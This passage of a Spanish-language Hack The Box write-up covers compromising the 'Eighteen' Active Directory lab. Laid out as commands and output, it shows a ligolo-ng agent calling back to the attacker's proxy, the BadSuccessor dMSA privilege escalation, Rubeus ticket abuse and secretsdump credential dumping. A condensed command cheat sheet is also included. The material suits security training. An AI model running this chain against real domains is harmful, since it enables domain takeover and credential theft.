39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68


PS C:\Users\adam.scott\Documents> netstat -ano | findstr /v UDP

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       396
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       396
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       2684
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2560
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1160
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1440
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:49680          0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:49681          0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:49684          0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:49689          0.0.0.0:0              LISTENING       808
  TCP    0.0.0.0:49703          0.0.0.0:0              LISTENING       2656
  TCP    0.0.0.0:57599          0.0.0.0:0              LISTENING       2636
  TCP    10.129.78.214:53       0.0.0.0:0              LISTENING       2656
  TCP    10.129.78.214:139      0.0.0.0:0              LISTENING       4
  TCP    10.129.78.214:5985     10.10.14.6:57228       ESTABLISHED     4
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       2656
  TCP    127.0.0.1:1434         0.0.0.0:0              LISTENING       2684
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:88                [::]:0                 LISTENING       820
  TCP    [::]:135               [::]:0                 LISTENING       396
  TCP    [::]:389               [::]:0                 LISTENING       820
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:464               [::]:0                 LISTENING       820
  TCP    [::]:593               [::]:0                 LISTENING       396
  TCP    [::]:636               [::]:0                 LISTENING       820
  TCP    [::]:1433              [::]:0                 LISTENING       2684
  TCP    [::]:3268              [::]:0                 LISTENING       820
  TCP    [::]:3269              [::]:0                 LISTENING       820
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:9389              [::]:0                 LISTENING       2560
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       820
  TCP    [::]:49665             [::]:0                 LISTENING       672
  TCP    [::]:49666             [::]:0                 LISTENING       1160
  TCP    [::]:49667             [::]:0                 LISTENING       1440
  TCP    [::]:49668             [::]:0                 LISTENING       820
  TCP    [::]:49680             [::]:0                 LISTENING       820
  TCP    [::]:49681             [::]:0                 LISTENING       820
  TCP    [::]:49684             [::]:0                 LISTENING       820
  TCP    [::]:49689             [::]:0                 LISTENING       808
  TCP    [::]:49703             [::]:0                 LISTENING       2656
  TCP    [::]:57599             [::]:0                 LISTENING       2636
  TCP    [::1]:53               [::]:0                 LISTENING       2656
  TCP    [::1]:389              [::1]:49682            ESTABLISHED     820
  TCP    [::1]:389              [::1]:49683            ESTABLISHED     820
  TCP    [::1]:389              [::1]:49702            ESTABLISHED     820
  TCP    [::1]:389              [::1]:63339            ESTABLISHED     820
  TCP    [::1]:1434             [::]:0                 LISTENING       2684
# [... cut ..]
PS C:\Users\adam.scott\Documents>

Iniciamos una nueva sesion con evil-winrm-py, subimos el agente de ligolo-ng a la maquina y realizamos una conexion a nuestro proxy.

1
2
3
4
5


evil-winrm-py PS C:\Users\adam.scott\Documents> upload ../www/agent.exe agent.exe
Uploading /home/kali/htb/www/agent.exe: 6.44MB [00:18, 362kB/s]                                                                                                                         
[+] File uploaded successfully as: C:\Users\adam.scott\Documents\agent.exe
evil-winrm-py PS C:\Users\adam.scott\Documents> 
evil-winrm-py PS C:\Users\adam.scott\Documents> ./agent.exe -connect 10.10.14.64:443 -ignore-cert

Localmente, tras ejecutar el proxy seleccionamos la sesion, creamos una interfaz, iniciamos el tunel y agregamos una ruta para los puertos locales.

1
2
3
4
5
6


# localhost ports
sudo ./proxy -selfcert -laddr 0.0.0.0:443
session # select <eighteen session number>
interface_create --name eighteen
tunnel_start --tun eighteen
interface_add_route --name eighteen --route 240.0.0.0/4

Vemos que localmente logramos el acceso por medio de ldap.

1
2
3
4


❯ nxc ldap 240.0.0.0 -u adam.scott -p iloveyou1
LDAP        240.0.0.0       389    DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb) (signing:Enforced) (channel binding:No TLS cert) 
LDAP        240.0.0.0       389    DC01             [+] eighteen.htb\adam.scott:iloveyou1 
❯

Privesc

Tras ejecutar SharpHound y Bloodhound, no se encontro permisos o grupos relevantes para adam, unicamente REMOTE MANAGEMENT USERS el cual permite a este usuario acceder por WinRM.

BloodyAD - CREATE_CHILD

Ejecutamos bloodyAD para listar los objetos a los que adamn tiene permisos. Se muestra que tiene el permiso CREATE_CHILD al OU Staff.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


❯ bloodyAD --host 240.0.0.0 -d eighteen.htb -u adam.scott -p iloveyou1 get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=eighteen,DC=htb
permission: WRITE

distinguishedName: OU=Staff,DC=eighteen,DC=htb
permission: CREATE_CHILD

distinguishedName: CN=adam.scott,OU=Staff,DC=eighteen,DC=htb
permission: WRITE
❯

BadSuccessor

El permiso CREATE_CHILD nos permite realizar un ataque “BadSuccessor”, este toma ventaja de cuentas dMSAs y permiso sobre un OU.

Ref.

Exploit

Para realizar la explotacion utilizamos BadSuccessor, importando este con Import-Module.

1
2
3
4
5


evil-winrm-py PS C:\Users\adam.scott\Documents> upload ../www/BadSuccessor.ps1 BadSuccessor.ps1
Uploading /home/kali/htb/www/BadSuccessor.ps1: 100%|███████████████████████████████████████████████████████████████████████████████████████████████| 16.3k/16.3k [00:00<00:00, 77.2kB/s]
[+] File uploaded successfully as: C:\Users\adam.scott\Documents\BadSuccessor.ps1
evil-winrm-py PS C:\Users\adam.scott\Documents> Import-Module ./BadSuccessor.ps1
evil-winrm-py PS C:\Users\adam.scott\Documents>

Ejecutamos especificando el OU, nombre del dMSA, nuestro usuario y el usuario privilegiado u objetivo.

1
2
3
4
5
6
7
8
9


PS C:\users\adam.scott\Documents> BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name bad -DelegatedAdmin adam.scott -DelegateTarget Administrator -domain eighteen.htb
Creating dMSA at: LDAP://eighteen.htb/OU=Staff,DC=eighteen,DC=htb
0
0
0
0
Successfully created and configured dMSA 'bad'
Object adam.scott can now impersonate Administrator
PS C:\users\adam.scott\Documents>

Con Rubeus solicitamos un nuevo ticket de nuestro usuario.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39


PS C:\users\adam.scott\Documents> ./Rubeus2.3.exe asktgt /user:adam.scott /password:iloveyou1 /domain:eighteen.htb /dc:dc01.eighteen.htb /nowrap /opsec /force

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3 

[*] Action: Ask TGT

[*] Using domain controller: dc01.eighteen.htb (fe80::285a:ee4c:16d2:ba3f%3)
[!] Pre-Authentication required!
[!]	AES256 Salt: EIGHTEEN.HTBadam.scott
[!]	AES128 Salt: EIGHTEEN.HTBadam.scott
[!]	Etype 23 Salt: <not provided>
[*] Using rc4_hmac hash: 9964DAE494A77414E34AFF4F34412166
[*] Building AS-REQ (w/ preauth) for: 'eighteen.htb\adam.scott'
[*] Using domain controller: fe80::285a:ee4c:16d2:ba3f%3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFpjCCBaKgAwIBBaEDAgEWooIEqTCCBKVhggShMIIEnaADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMRUlHSFRFRU4uSFRCo4IEYTCCBF2gAwIBEqEDAgECooIETwSCBEv+k1lN0M/0UViXZmpYoc2Vhurw5hY+Zbte4cFcKVnHia0DHHeEfhcQfvpAsmu82EFSKN8Rq2S135dR9M6e3eToS3fNrfBavs2bOCuK56O6Pzm6bj+g1Cm/ydhb6YQwarsFPzDnQKQLq6ozParO/fgXyM9EBzOsYlEzQox1scD1V4CCB7ZTQqqPou8/bv/aYsSKx3CAS9gGk8SExJxKvsV3jVNktZxciGEhufzVyfYVsubtAW+zztwyqQtP90xRAPA1+XM3/2iYl/FE5bJZ2zK7gPPyH52ek9m4hbwG2DdG1xoz9trJJaLLtViDS8CcGm8W/MJnWV+re08Qvn08RHxpGEpwCnLUUpagjCTbPQ7GNeFjCnozVfd6oqPn952EU4MbiwQI3mNc/SxdBNC8U3x+6JNkB9kxq60GjjgdSWyLXMakToB75jXY6EQAc2tHJ8PEid4YMq3MPbqj7AqxZt+nUEQghnVjUfixsjngY9lW8TF1vzMqbUvUQdxOwf/aKpQqRWgz5VLWXlcmLtOgBHuqxvYmJYjNw/5fPq5J04di/JfQiNl6AoLbz3CJwB8Svq6b8j81tNwBJw2JKUFshzXVPkDvwugzEUBXX5/tWoz3T7dbo4AgNVV7Yo8uHLkxM6nxh0t/VcbXySToziqygz8oa0xzXPW9tgilKtSds4Mz3wfljGitq4FMroY1L1jD8q3EHVbgXq/aeUT4yn3qegAe4iPbKK6yOzw1ZQXtl552FYeBLz4kcNlDP8D9jmut+WwPLL8/iMZ6+JkfIHvPyn+MFotCJRbsTqj0LOd+ZlhkkPnZWVJG1MZ0X1ACSwcMeR/YnAblzYxIkKb3Z0LeNXgLwFd8vyeJvUWPI2rXDiL6vkOl3k15SQ03qDQlwb+kUHo5OmymVpbkSEAfH7E6ETOW0+XFBGPm44wPKP9AKd2/WavbRdfBgrvpRTNQN39ofsDnoBr1qsMM3BJPrAMKujm1ABMT9ytgBnukxmE5dFPnyLruW+Cq/J9/UQJO9/H0edBS3ZzjXvgoyKENwceG3MWBUqaztPmwxz9pHwijbj15gdaBKgU2D4hD70/CeNTgAyrpB6GrKZ+01C5oUB+mv5kIm9RTNP23SoNjbry6NfHkyU146FxIdOzP40EtON8Z3oo6UDnBe5MFwdbjlz09ldTmJAt46s9mS/dIbYxHsTNi6BOuj0hMqbm+09yZVK1uRASWa+ugEhWe1+fgdxUpzKnC8OY5fzq54dsVD1V6lvzx1rD3GpE5M+lOf6J6lOjehZ8mphd7Ah/e8Vbjn0boh6TpKVStKD2nr9bZlnudOyRwWVIA1Sm70iNV/WD+jr1iQa2eT0pyF2mNWww2jmAsahAh++D8XFy6qM2+ws8WtL6CoYSotH7cE0CNMUDfr2IAOBMbADQa6mJumqwZA8ypa28YBgUSWki+U9CpehLI9DwW3mqYDWUECGQdZphLo4HoMIHloAMCAQCigd0Egdp9gdcwgdSggdEwgc4wgcugKzApoAMCARKhIgQgApNigRhGT47Saq+XqVhvBcNjqpR0Fg+U64VPYCFrIKGhDhsMRUlHSFRFRU4uSFRCohcwFaADAgEBoQ4wDBsKYWRhbS5zY290dKMHAwUAQOEAAKURGA8yMDI1MTExNjA5NDQwNFqmERgPMjAyNTExMTYxOTQ0MDRapxEYDzIwMjUxMTIzMDk0NDA0WqgOGwxFSUdIVEVFTi5IVEKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDEVJR0hURUVOLkhUQg==

  ServiceName              :  krbtgt/EIGHTEEN.HTB
  ServiceRealm             :  EIGHTEEN.HTB
  UserName                 :  adam.scott (NT_PRINCIPAL)
  UserRealm                :  EIGHTEEN.HTB
  StartTime                :  11/16/2025 1:44:04 AM
  EndTime                  :  11/16/2025 11:44:04 AM
  RenewTill                :  11/23/2025 1:44:04 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  ApNigRhGT47Saq+XqVhvBcNjqpR0Fg+U64VPYCFrIKE=
  ASREP (key)              :  9964DAE494A77414E34AFF4F34412166

PS C:\users\adam.scott\Documents>

Este ultimo lo utilizamos para solicitar uno nuevo ahora para el dMSA que recien fue creado.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40


PS C:\users\adam.scott\Documents> ./Rubeus2.3.exe asktgs /targetuser:bad$ /service:krbtgt/eighteen.htb /opsec /dmsa /nowrap /ptt /outfile:ticket.kirbi /ticket:doIFpjCC[...ticket...]R0hURUVOLkhUQg==

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3 

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building DMSA TGS-REQ request for 'bad$' from 'adam.scott'
[+] Sequence number is: 993886314
[*] Using domain controller: DC01.eighteen.htb (fe80::285a:ee4c:16d2:ba3f%3)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

      doIFkjCCBY6gAwIBBaEDAgEWooIEmzCCBJdhggSTMIIEj6ADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMRUlHSFRFRU4uSFRCo4IEUzCCBE+gAwIBEqEDAgECooIEQQSCBD1ATcT6DF10JcCiDCZ+n1X8wut2pdMt2jU8B3xhyAOdhnBcRXiw/0t4eSEf2CX+iquUOND3WdYiPVwhID25B/Yw7bXV69tKyQzG6Z5rmHernws1Z2kTQ0JnwMCXIOjXfkUcjbTluTJRPe96rWwFDHJERa1LYVh+G1iTbk5gEnAwVSJ2U+9wUj8fCIS4jum4skw18FEMiqszqi7nkmgLK3mnl+o3iCbyMC3RHIuN8MLbNoMTU0E8Ze0o8uQztHS4H0jMVpS2qofFLOtPL2aMpNV7JBu/qZBLZnEqI5KXi2ANTso2vVwhTwKbhkK/fcWzR8a0y5q1Zxqu15Dz2QPU6DvAtrnoNBpSDM56GaZcOlwosOjaRMW0Z+nEIyPxVN8kKyebB0UnUk3Flhev3I1TzZQ8DupptzNb14JJxErFfFnGg7BBeDFsWy4x3Rr1Hh2FSv8S4OzFIyZvj2jQacuX1bZunrNfAxfTMp+CZoTNjRXBrF69ahlbqb+8yt5GkOxh1CAAxnCegeSU1lx9jGUnAenMtnbvNXf5IBOIJPqePY/s/C1Na/EgEWWo5zE6QBkCfuOgVlxeUT/yq92ZbdJ0GXzmi600/oKtoTk/OuCazmr90NS14wC4yA8YyaEnprv907hD1M+yDCg5hlewrz/izvVszPNh4AjhK6Xhw7txdjsvlJFerHE9xq3+aE1ncWj64i2x1+fpaum2i1C+2WQEGkEuaGvg+2WcYIA6WemTgItmZu687AL0vM5fGbgEnPEsm1gg7J6/ECZE/SNTT0hX6O7LPc5nqld2gsauZGM6UAL5ExJzFzM9spwtLYWHj0MXyLhiQV9IQs3Yp7ukSxAC+sdK0ieSpZymP5pTMc4Pp50kRcBG4icf5f00Qkfnr3oVf7N0OzamQPV411S6b9GCV4N88IXebGs3cAy8r8NaGoRNb0Z+lmvxnDyjZxa5DuC5tEhnCEsLevkTJAuirvraVh1zp5/Y4JTCoMSmIkHePgQ4nLqTQPUXNx5aBexoNMpmeR3rNnvjGiWw7/JtfJpN42IIgJCP54EL8rKNFNrpMEmDZ8DmYBObuyLKxu++5IuByw0CslaMvTO7v8IzWTSiWgGZwovn0t35V3u7U0eBXgLKjBrEQNewzsxtp6WQMSC8d7EOObRl6eu7TdN2wYtB68WhsBKt8UBtkOPJIdMkVOigOJ6BCoXHyPSPxprzN8ESc80T07BAd4RHY2He2aYG879JPpoDZvtre36w/12bGLPVdNtnrzOiuiK3bJHJqy2glee6NbbU/pvHOqFiDxFCzeT+qY0VhNixO7pNCe/iyyLDwztCWU2RSDag1n8kmvJk0fNivaKeJ+FNgd0cs2qlWB0HO2Z9vAutK2SShUnLy2nH/Vf89uF6C0Di/yTWiTZpRAX84TRsV9nDT90i1h7M2EYZP7JwZ2NYGjM41p2n4KOB4jCB36ADAgEAooHXBIHUfYHRMIHOoIHLMIHIMIHFoCswKaADAgESoSIEILUe3+Ge9uSTgTz6OwJYYEM3+MRgmpTCdydmS10ZfoKQoQ4bDGVpZ2h0ZWVuLmh0YqIRMA+gAwIBAaEIMAYbBGJhZCSjBwMFAEChAAClERgPMjAyNTExMTYwOTQ0MzhaphEYDzIwMjUxMTE2MDk1OTM4WqcRGA8yMDI1MTEyMzA5NDQwNFqoDhsMRUlHSFRFRU4uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxFSUdIVEVFTi5IVEI=

  ServiceName              :  krbtgt/EIGHTEEN.HTB
  ServiceRealm             :  EIGHTEEN.HTB
  UserName                 :  bad$ (NT_PRINCIPAL)
  UserRealm                :  eighteen.htb
  StartTime                :  11/16/2025 1:44:38 AM
  EndTime                  :  11/16/2025 1:59:38 AM
  RenewTill                :  11/23/2025 1:44:04 AM
  Flags                    :  name_canonicalize, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  tR7f4Z725JOBPPo7AlhgQzf4xGCalMJ3J2ZLXRl+gpA=
  Current Keys for bad$: (aes256_cts_hmac_sha1) A6EE5020CCF2EFA61CA2E2C9AAD7C7D34FF80CED71C367E7894992FD74260E04


[*] Ticket written to ticket.kirbi


PS C:\users\adam.scott\Documents>

Convertimos el ticket con ticketConverter.

1
2
3
4
5
6


❯ impacket-ticketConverter ticket.kirbi output.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done
❯

Utilizamos el ticket para ejecutar secretsdump y obtener el hash de administrator.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


❯ KRB5CCNAME=output.ccache faketime "$(ntpdate -q 240.0.0.1 | cut -d ' ' -f 1,2)" impacket-secretsdump eighteen.htb/bad\$@dc01.eighteen.htb -k -no-pass -just-dc-ntlm -dc-ip 240.0.0.1 -target-ip 240.0.0.1
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a7c7a912503b16d8402008c1aebdb649:::
mssqlsvc:1601:aad3b435b51404eeaad3b435b51404ee:c44d16951b0810e8f3bbade300966ec4:::
eighteen.htb\jamie.dunn:1606:aad3b435b51404eeaad3b435b51404ee:9fbaaf9e93e576187bb840e93971792a:::
eighteen.htb\jane.smith:1607:aad3b435b51404eeaad3b435b51404ee:42554e3213381f9d1787d2dbe6850d21:::
eighteen.htb\alice.jones:1608:aad3b435b51404eeaad3b435b51404ee:43f8a72420ee58573f6e4f453e72843a:::
eighteen.htb\adam.scott:1609:aad3b435b51404eeaad3b435b51404ee:9964dae494a77414e34aff4f34412166:::
eighteen.htb\bob.brown:1610:aad3b435b51404eeaad3b435b51404ee:7e86c41ddac3f95c986e0382239ab1ea:::
eighteen.htb\carol.white:1611:aad3b435b51404eeaad3b435b51404ee:6056d42866209a6744cb6294df075640:::
eighteen.htb\dave.green:1612:aad3b435b51404eeaad3b435b51404ee:7624e4baa9c950aa3e0f2c8b1df72ee9:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d79b6837ac78c51c79aab3d970875584:::
bad$:12607:aad3b435b51404eeaad3b435b51404ee:4450d68bd2b3f724e3f1eb747718bb43:::
[*] Cleaning up... 
❯

BadSuccesor Commands Exploitation

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


# BadSuccessor commands
# Import Module
Import-Module ./BadSuccessor.ps1
# Run in Exploitation mode with the OU, dMSA account, low user and privileged user
BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name bad -DelegatedAdmin adam.scott -DelegateTarget Administrator -domain eighteen.htb
# request a ticket for the low user
./Rubeus2.3.exe asktgt /user:adam.scott /password:iloveyou1 /domain:eighteen.htb /dc:dc01.eighteen.htb /nowrap /opsec /force
# request a ticket with the low user ticket for the dMSA account
./Rubeus2.3.exe asktgs /targetuser:bad$ /service:krbtgt/eighteen.htb /opsec /dmsa /nowrap /ptt /outfile:ticket.kirbi /ticket:<ticket>
# convert the ticket (kirbi)
impacket-ticketConverter ticket.kirbi output.ccache
# request ntlm hash for users via secretsdump
KRB5CCNAME=output.ccache faketime "$(ntpdate -q 240.0.0.1 | cut -d ' ' -f 1,2)" impacket-secretsdump eighteen.htb/bad\$@dc01.eighteen.htb -k -no-pass -just-dc-ntlm -dc-ip 240.0.0.1 -target-ip 240.0.0.1

Shell

Con el hash obtuvimos una nueva shell como administrador y realizamos la lectura de root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


❯ evil-winrm-py -i eighteen.htb -u administrator -H 0b133be956bfaddf9cea56701affddec
          _ _            _                             
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _ 
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.5.0

[*] Connecting to 'eighteen.htb:5985' as 'administrator'
evil-winrm-py PS C:\Users\Administrator\Documents> whoami
eighteen\administrator
evil-winrm-py PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
47705a51646fd9cbf77c57f30a9a7f2a
evil-winrm-py PS C:\Users\Administrator\Documents>

Dump Hashes

Realizamos un dump de las hashes con impacket-secretdumps.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101


❯ impacket-secretsdump administrator@dc01.eighteen.htb -hashes :0b133be956bfaddf9cea56701affddec -dc-ip 240.0.0.1 -target-ip 240.0.0.1
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x8a6c03715ce8a8d26720e83ffe01c780
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
EIGHTEEN\DC01$:aes256-cts-hmac-sha1-96:25d862a0f5cbe47c62167d4f57ef04d768965e76e1f8d18b4b95878b8a4fd028
EIGHTEEN\DC01$:aes128-cts-hmac-sha1-96:a4a8a36f0bf18ace2a587e5524a77843
EIGHTEEN\DC01$:des-cbc-md5:26618a9bc2b97302
EIGHTEEN\DC01$:plain_password_hex:4300770067007000580054005000520033004b005a0038004f00570069006200570074007900350032006f0048003300310054002b0031007a0070006b004b0039006d0037005400620052006b0074004800550051005200550063007200610074005600330072003500720057005a00580068005300360051006800770066004500360031006a0062006a00320063004b004c00320034007100520044003100740046007200320059002b0037004f0058002b0041004100370070004d003d0076006a006d006e004e007a00360042005200690067006400740037004d00350070006e0061006f00350079004300590038006a004c0068004c0069005500700047006d006a00470059006d00410068003800530049004e0046004d0072006b00670053006200790075007a003300620054006700660073004b006a00760048003900720030003300590046003200590035006c005a004d007900380076004b0079003500340037004200770058004c0067006f0054002b006e0065007300510037004a00700074003d003100410038005900750042007600490045007100640061006400760077004d0043006a00330047005700730043004d0038007a004f00730070004f006b004b0079004200690070004500360058006700760050005700480054004d004a00470073007200690056004f0065004e00420038004c006200
EIGHTEEN\DC01$:aad3b435b51404eeaad3b435b51404ee:d79b6837ac78c51c79aab3d970875584:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x48249fb0f4cf23ecbef54affc2b21d65717bf7df
dpapi_userkey:0xb8820f0412fc851cca8aa426248e7f37af5dd0b2
[*] NL$KM 
 0000   FA 36 C7 D5 C0 82 AB B5  78 E1 17 F0 5E 36 13 5B   .6......x...^6.[
 0010   A5 9F C0 9C 38 A8 C4 34  FE 20 F7 2B D9 A2 8C AF   ....8..4. .+....
 0020   71 F2 E0 D2 09 A1 EC 09  EB DE 9B 8C F5 4A E6 2D   q............J.-
 0030   6B 1D 32 16 A2 ED B4 AE  F1 51 AE 5B 41 E5 4E B6   k.2......Q.[A.N.
NL$KM:fa36c7d5c082abb578e117f05e36135ba59fc09c38a8c434fe20f72bd9a28caf71f2e0d209a1ec09ebde9b8cf54ae62d6b1d3216a2edb4aef151ae5b41e54eb6
[*] _SC_MSSQLSERVER 
EIGHTEEN\mssqlsvc:zOq3u4AKw5]e
[*] _SC_SQLSERVERAGENT 
EIGHTEEN\mssqlsvc:!JpC319216bama
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a7c7a912503b16d8402008c1aebdb649:::
mssqlsvc:1601:aad3b435b51404eeaad3b435b51404ee:c44d16951b0810e8f3bbade300966ec4:::
eighteen.htb\jamie.dunn:1606:aad3b435b51404eeaad3b435b51404ee:9fbaaf9e93e576187bb840e93971792a:::
eighteen.htb\jane.smith:1607:aad3b435b51404eeaad3b435b51404ee:42554e3213381f9d1787d2dbe6850d21:::
eighteen.htb\alice.jones:1608:aad3b435b51404eeaad3b435b51404ee:43f8a72420ee58573f6e4f453e72843a:::
eighteen.htb\adam.scott:1609:aad3b435b51404eeaad3b435b51404ee:9964dae494a77414e34aff4f34412166:::
eighteen.htb\bob.brown:1610:aad3b435b51404eeaad3b435b51404ee:7e86c41ddac3f95c986e0382239ab1ea:::
eighteen.htb\carol.white:1611:aad3b435b51404eeaad3b435b51404ee:6056d42866209a6744cb6294df075640:::
eighteen.htb\dave.green:1612:aad3b435b51404eeaad3b435b51404ee:7624e4baa9c950aa3e0f2c8b1df72ee9:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d79b6837ac78c51c79aab3d970875584:::
[*] Kerberos keys grabbed
Administrator:0x14:977d41fb9cb35c5a28280a6458db3348ed1a14d09248918d182a9d3866809d7b
Administrator:0x13:5ebe190ad8b5efaaae5928226046dfc0
Administrator:aes256-cts-hmac-sha1-96:1acd569d364cbf11302bfe05a42c4fa5a7794bab212d0cda92afb586193eaeb2
Administrator:aes128-cts-hmac-sha1-96:7b6b4158f2b9356c021c2b35d000d55f
Administrator:0x17:0b133be956bfaddf9cea56701affddec
krbtgt:aes256-cts-hmac-sha1-96:56b1a6191645e0d5adf64a84418ecee5f79abe7c2109f3aeca08b1cc1381d024
krbtgt:aes128-cts-hmac-sha1-96:5ad1b9baa9295bacca1286535e9efd8e
krbtgt:0x17:a7c7a912503b16d8402008c1aebdb649
mssqlsvc:0x14:24746f3467856094de1b83e938136500911767a12d2d3b2e14105765d3d7cec9
mssqlsvc:0x13:6ce61b6b5a08284c131ef7fbf4d85a00
mssqlsvc:aes256-cts-hmac-sha1-96:d9ecd6b2a939ab8fe27dca49d889315cafdd6ebecc10cde4af7bfc653f9da607
mssqlsvc:aes128-cts-hmac-sha1-96:76a931bfb4184ac5efae82263d95f215
mssqlsvc:0x17:c44d16951b0810e8f3bbade300966ec4
eighteen.htb\jamie.dunn:0x14:2c016f9a18c0026c29b71384e567a8ef39caba6171a003a8bbc2e1111645a813
eighteen.htb\jamie.dunn:0x13:92f1fae2c11f9600f5b6181082214f0e
eighteen.htb\jamie.dunn:aes256-cts-hmac-sha1-96:dbde889da88b5f07c7401663a953f54fdd6f414e54392101f1d9eb6a1c7679e7
